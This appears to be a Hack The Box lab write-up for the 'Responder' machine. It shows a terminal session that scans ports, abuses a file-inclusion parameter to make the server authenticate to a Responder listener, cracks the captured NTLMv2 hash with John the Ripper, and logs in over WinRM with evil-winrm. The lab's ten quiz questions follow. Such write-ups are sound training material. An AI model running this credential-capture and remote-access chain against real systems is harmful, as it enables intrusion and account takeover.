Skip to main content
← Back to HTB Writeups
Very EasyTier 1Windows10.129.95.234

$ responder.pwn()

A Windows web server redirects to unika.htb. The 'page' parameter is vulnerable to LFI/RFI. By pointing it to our Responder listener, the server authenticates to us leaking an NTLMv2 hash. John the Ripper cracks the hash to reveal the administrator password, which we use to access the machine via WinRM on port 5985.

Techniques

LFI (Local File Inclusion)RFI (Remote File Inclusion)NTLMv2 Hash CapturePassword CrackingWinRM Remote Access

Open Ports

80/tcphttpApache httpd 2.4.52 (Win64) PHP/8.1.1
5985/tcpwinrmMicrosoft HTTPAPI 2.0
7680/tcppando-pub

Terminal Session

wazimu@htb ~ responder
┌─[wazimu@htb-pehky9vyjl]─[~]
└──╼ [★]$ nmap -sVC -T4 -Pn -p- 10.129.95.234

PORT     STATE SERVICE    VERSION
80/tcp   open  http       Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
5985/tcp open  http       Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
7680/tcp open  pando-pub?
Service Info: OS: Windows

┌─[root@htb-pehky9vyjl]─[/home/wazimu]
└──╼ # nano /etc/hosts
# Added: 10.129.95.234  unika.htb

┌─[root@htb-pehky9vyjl]─[/home/wazimu]
└──╼ # responder -I tun0

           NBT-NS, LLMNR & MDNS Responder 3.1.3.0

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.129.95.234
[SMB] NTLMv2-SSP Username : RESPONDER\Administrator
[SMB] NTLMv2-SSP Hash     : Administrator::RESPONDER:3d4cd14badba76e1:...

# Hash saved → cracked with John The Ripper
# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
# Password: badminton

# Access via WinRM (port 5985)
# evil-winrm -i 10.129.95.234 -u administrator -p badminton
[✓] Shell obtained — flag captured!

Tasks (10)

1.

When visiting the web service using the IP address, what is the domain that we are being redirected to?

2.

Which scripting language is being used on the server to generate webpages?

3.

What is the name of the URL parameter which is used to load different language versions of the webpage?

4.

Which of the following values for the `page` parameter would be an example of exploiting a Local File Include (LFI) vulnerability?

5.

Which of the following values for the `page` parameter would be an example of exploiting a Remote File Include (RFI) vulnerability?

6.

What does NTLM stand for?

7.

Which flag do we use in the Responder utility to specify the network interface?

8.

There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as `john`, but the full name is what?

9.

What is the password for the administrator user?

10.

We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?

Root Flag

← All WriteupsCybersecurity Quizzes →